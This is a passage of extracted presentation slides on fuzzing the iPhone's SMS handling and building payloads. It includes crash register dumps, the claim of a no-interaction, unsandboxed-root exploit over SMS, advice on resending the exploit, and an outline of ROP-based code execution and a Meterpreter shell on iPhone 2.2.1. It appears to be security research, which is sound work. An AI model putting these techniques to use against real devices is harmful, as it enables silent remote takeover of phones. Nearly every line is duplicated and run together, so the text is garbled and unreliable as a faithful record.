ACCESS VIOLATIONACCESS VIOLATIONr0=00000001 r1=00003be9 r2=r0=00000001 r1=00003be9 r2=deadbee0deadbee0 r3=r3=babecafebabecafer4=000f8000 r5=0033be80 r6=00000001 r4=000f8000 r5=0033be80 r6=00000001 r7=0060393cr8=000f80d8 r9=0082a000 r10=0000001f r7=0060393cr8=000f80d8 r9=0082a000 r10=0000001f r11=f7ab6fbbr12=fff00000 sp=00603920 lr=314559b4 r11=f7ab6fbbr12=fff00000 sp=00603920 lr=314559b4 pc=31455a80ctrl=a0000010libSystem.B.dylib!pc=31455a80ctrl=a0000010libSystem.B.dylib!_tiny_malloc_from_free_list_tiny_malloc_from_free_list+240:pc=31455a80 00 30 82 15 +240:pc=31455a80 00 30 82 15 strne r3, strne r3, [r2][r2]31467aa4> dd 000f805c000f805c | 00329530 00329b50 00337770 31467aa4> dd 000f805c000f805c | 00329530 00329b50 00337770 00310740000f806c | 00000000 00000000 00000000 00000000000f807c | 00310740000f806c | 00000000 00000000 00000000 00000000000f807c | 00339190 00000000 0032ac10 00000000000f808c | 00000000 00000000 00339190 00000000 0032ac10 00000000000f808c | 00000000 00000000 00000000 00000000000f809c | 00324990 003290f0 00000000 00000000 00000000000f809c | 00324990 003290f0 00000000 00000000000f80ac | 00000000 003295d0 00322900 00000000000f80bc | 00000000000f80ac | 00000000 003295d0 00322900 00000000000f80bc | 00000000 00000000 00000000 00000000000f80cc | 00000000 00000000 00000000 00000000 00000000 00000000000f80cc | 00000000 00000000 00000000 00000000 0033be800033be8031467aa4> dd 0033be800033be80 | 31467aa4> dd 0033be800033be80 | babecafe f7ab6fbb babecafe f7ab6fbb 000f80dc 00000000000f80dc 000000000033be90 | c0000003 c00c9557 00330041 0033be90 | c0000003 c00c9557 00330041 00000000...00000000...

Free Free tabletable

Real heap metadataReal heap metadata

Page 57: iPhone: Fuzzing and Payloads

The dream becomes The dream becomes realityreality

ACCESS VIOLATIONr0=00305240 r1=00000006 r2=0005b1f0 ACCESS VIOLATIONr0=00305240 r1=00000006 r2=0005b1f0 r3=00305214r4=00305210 r5=00603a6c r6=00000006 r3=00305214r4=00305210 r5=00603a6c r6=00000006 r7=00603a38r8=00000000 r9=0082a600 r10=00000000 r7=00603a38r8=00000000 r9=0082a600 r10=00000000 r11=00000000r12=00063290 sp=00603a38 lr=00044adb r11=00000000r12=00063290 sp=00603a38 lr=00044adb pc=babecafcpc=babecafcctrl=00000010AudioToolbox!ctrl=00000010AudioToolbox!_gSystemSoundList+7e3712dc:pc=babecafc ???_gSystemSoundList+7e3712dc:pc=babecafc ???

Did I mention this requires no user-Did I mention this requires no user-interaction, and it runs as unsandboxed interaction, and it runs as unsandboxed

root?root?

Page 58: iPhone: Fuzzing and Payloads

In allIn all

519 SMS’s (@ 1/sec)519 SMS’s (@ 1/sec)

Only one shows up to userOnly one shows up to user

Can cause CommCenter to restart at will (for Can cause CommCenter to restart at will (for clean slate)clean slate)

Keep trying - you can throw the exploit as Keep trying - you can throw the exploit as many times as you like, there’s nothing the many times as you like, there’s nothing the victim can do to stop you!victim can do to stop you!

Page 59: iPhone: Fuzzing and Payloads

iPhone MeterpreteriPhone Meterpreter

Page 60: iPhone: Fuzzing and Payloads

iPhone 2.0 memory funiPhone 2.0 memory fun

Security architecture: No writeable page may Security architecture: No writeable page may become executablebecome executable

How do debuggers work?!?!How do debuggers work?!?!

Can make existing library writable (using Can make existing library writable (using VM_PROT_COPY flag), overwrite code, make it VM_PROT_COPY flag), overwrite code, make it executable againexecutable again

Can do this using return oriented programming Can do this using return oriented programming payload (remember there is no ASLR)payload (remember there is no ASLR)

Page 61: iPhone: Fuzzing and Payloads

So what?So what?

App store code may “update” itselfApp store code may “update” itself

Generic shellcode can be runGeneric shellcode can be run

dyld can be modifieddyld can be modified

dyld makes sure only signed libraries are dyld makes sure only signed libraries are loaded, so...loaded, so...

Can load unsigned librariesCan load unsigned libraries

Page 62: iPhone: Fuzzing and Payloads

MeterpreterMeterpreter

Originally an advanced Metasploit payload for Originally an advanced Metasploit payload for WindowsWindows

Better than a shellBetter than a shell

Upload, download, and edit files on the flyUpload, download, and edit files on the fly

Redirect traffic to other hosts (pivoting)Redirect traffic to other hosts (pivoting)

On iPhone, provides a shell on a system without On iPhone, provides a shell on a system without /bin/sh!/bin/sh!

Page 63: iPhone: Fuzzing and Payloads

Demo!Demo!

iPhone 2.2.1iPhone 2.2.1Not JailbrokenNot Jailbroken

Not a Development phoneNot a Development phoneUsing Ad-Hoc distribution on provisioned phoneUsing Ad-Hoc distribution on provisioned phone

Page 64: iPhone: Fuzzing and Payloads

iPhone version 3iPhone version 3

They fixed this bugThey fixed this bug

Debugging only works on Development phones (or Debugging only works on Development phones (or processes with special ‘provisions’)processes with special ‘provisions’)

Open question whether generic shellcode can be Open question whether generic shellcode can be run on iPhone 3run on iPhone 3

No ASLR means that return oriented programming No ASLR means that return oriented programming is still possible on iPhone 3.0is still possible on iPhone 3.0

Page 65: iPhone: Fuzzing and Payloads

ConclusionsConclusions

SMS bugs are very badSMS bugs are very bad

Heap manipulation over SMS is hard but possibleHeap manipulation over SMS is hard but possible

SMS fuzzing can be done over a local networkSMS fuzzing can be done over a local network

Against 2.2.1 you could get a root owned Against 2.2.1 you could get a root owned Meterpreter shell via SMSMeterpreter shell via SMS

iPhone continues to get more secure but still lacks iPhone continues to get more secure but still lacks ASLRASLR

Page 66: iPhone: Fuzzing and Payloads

Questions?Questions?

Contact me at Contact me at [email protected]@securityevaluators.com